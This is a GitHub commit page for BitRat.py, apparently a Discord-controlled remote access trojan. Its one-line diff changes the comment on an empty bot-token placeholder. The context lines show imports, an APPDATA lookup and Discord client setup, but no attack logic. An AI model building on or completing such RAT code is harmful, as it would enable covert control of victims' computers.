Skip to content

Commit 4b2e08d

Browse files
author
DaniDuese
authored
Bugfixes
1 parent c725b15 commit 4b2e08d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

BitRat.py

+1-1
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@
1313
from ctypes import *
1414
import asyncio
1515
from discord import utils
16-
token = '' #Enter your token here
16+
token = '' #Paste your Bot Token here
1717
global appdata
1818
appdata = os.getenv('APPDATA')
1919
client = discord.Client()

0 commit comments

Comments
 (0)